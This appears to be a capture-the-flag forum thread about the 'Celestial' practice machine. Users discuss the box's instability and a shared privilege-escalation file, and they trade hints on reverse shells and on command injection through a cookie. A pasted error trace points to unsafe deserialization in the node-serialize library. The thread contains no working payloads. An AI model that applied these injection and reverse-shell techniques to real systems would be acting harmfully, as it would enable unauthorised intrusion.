Celestial hint

@xtech said:
the exploits that you have to use for user is interesting. but priv esc is not implemented well at all, you edit the file and you have to wait. once the time is already there, some other idiot edits the file with wrong input, then you have to get into an editing war with other people.Also, lets not forget that the machine crashes for 20 min every 10 min ANDDDD when the machine crashes which means every 10 min, you have to re-exploit the user. pretty bad implementation. at least give ssh. ( DONT REPLY WITH GET VIP MEMBERSHIP cuz other free boxes are smoothly implemented with much harder exploitation) PEACE

Waiting 5 minutes wouldn’t be so bad if the box could stay up for more than 5 minutes at a time…

There are some reverse shells for this platform that should not crash the server - according to a comment in the code. As far as I can tell from my tests this is not true (unless every time I tested with such shells somebody crashed the server with their hack).

Otherwise, it’s a really interesting box. I also agree with @3ndG4me that you don’t need THAT ARTICLE. Seems I did not find it initially, but used only more generally advice on vulnerabilities in code in this language - which evil function not to use as a developer :wink: I learned a lot from building up my own exploit code, testing snippets in the browser console locally etc. You can trigger different server-side messages, and one will confirm that you are on the right track as it mentions the evil function :wink:

I also tried different variations for the reverse shell code in that language - seems with some shells you get you an initial connect but then they aren’t stable … which can be hard to troubleshoot because of the frequents resets. I finally found THAT ARTICLE but only used the part of another linked article that creates the reverse shell - seems that shell was more stable than others. I would be interested in discussing details over PM - which reverse shell code you used and what detail of the code really makes the shell stable … I think it is related to handling errors and disconnects …

Got root but I think that I missed few things. Can somebody DM me to discuss please?

Hi Could someone PM me how to advance (trying to get user access), I can’t find “the article” everyone is referring to. Thanks!

@BobBobbington said:
Hi Could someone PM me how to advance (trying to get user access), I can’t find “the article” everyone is referring to. Thanks!

I pm you

@s2233 said:
Waiting 5 minutes wouldn’t be so bad if the box could stay up for more than 5 minutes at a time…

yeah wait 5 min but how about someone changes your script to a reverse shell in these minutes, deleting your script and crashing the server :-1:

As I’d been asked per PM - I rooted it, but I would be interested in discussing details of others’ reverse shell code over PM. I wrote my own script for piecing together the exploit, and I tested snippets of code for creating a reverse shell. I’d like to understand why and if some shells are more stable than others - even if they all use the same core code that actually makes the connection …

Should possibly correct that spoilery wording…

@kekra said:
As I’d been asked per PM - I rooted it, but I would be interested in discussing details of others’ reverse shell code over PM.

I am really most interested in learning what features would generally make a reverse shell stable (in whatever programming language) in an unreliable environment such as this box is … Scrolling back in this thread shows that others also said the same code was working for them at one day, and then the other day not.

What I should also add: I become VIP member yesterday, so when I finally rooted it - using a seemingly good version of the code - I was working on a more stable machine.

yntaxError: Unexpected token

   at Object.parse (native)
   at Object.exports.unserialize (/home/sun/node_modules/node-serialize/lib/serialize.js:62:16)
   at /home/sun/server.

when ever i try to get the reverse shell i get this why is it so can someone please tell me

Just pwned this - If anybody needs some hints DM me

;-; whyz you needz hintz

when ever i am running the exploit i am getting
An error occurred…invalid username type

why is it so can you help me

nvm got it

@stevv said:
when ever i am running the exploit i am getting
An error occurred…invalid username type

why is it so can you help me

Feel free to PM me - I’ll try to help debug it with you

Hi everyone,
I try to get the user’s flag via the cookie to inject system commands but without success.
I get this page:
“Hey Dummy undefined + undefined is NaN”
I think it’s a syntax error but I’m not sure.
Can anyone PM me to debug this with me please ?

@stevv said:
when ever i am running the exploit i am getting
An error occurred…invalid username type

why is it so can you help me

nvm got it

I am stuck on that bit, could you PM me what you changed? I think I’m missing something obvious

can someone help me here in the last step of priv escalation but not getting the s**** back but when i manually run it its getting a connection back

Hi all, I’m sending the exploit correctly, however I don’t seem to be getting a response, any tips, PM me?

if somebody needs any help pm me

@xtech said:

@s2233 said:
Waiting 5 minutes wouldn’t be so bad if the box could stay up for more than 5 minutes at a time…

yeah wait 5 min but how about someone changes your script to a reverse shell in these minutes, deleting your script and crashing the server :-1:

Hey @xtech I 100% agree with you. That is something I personally had not considered when designing the priv esc. It definitely makes things trickier in the free HTB environments. I can’t undo the damage in this case unfortunately, but I definitely have a solution to prevent a poor design choice like this should I use a similar technique for a challenge in the future.

I really appreciate you speaking up about that issue, it forced me to really think about the design of machines for HTB, and come up with a better way to implement something like that later on.

@s2233 said:

Hey @xtech I 100% agree with you. That is something I personally had not considered when designing the priv esc. It definitely makes things trickier in the free HTB environments. I can’t undo the damage in this case unfortunately, but I definitely have a solution to prevent a poor design choice like this should I use a similar technique for a challenge in the future.

I really appreciate you speaking up about that issue, it forced me to really think about the design of machines for HTB, and come up with a better way to implement something like that later on.

yeah i knew the solution to get root but waited for the next day to execute it due to that guy who kept changing my script. However, the user exploit was good. Anyway, thanks for your contribution :slight_smile: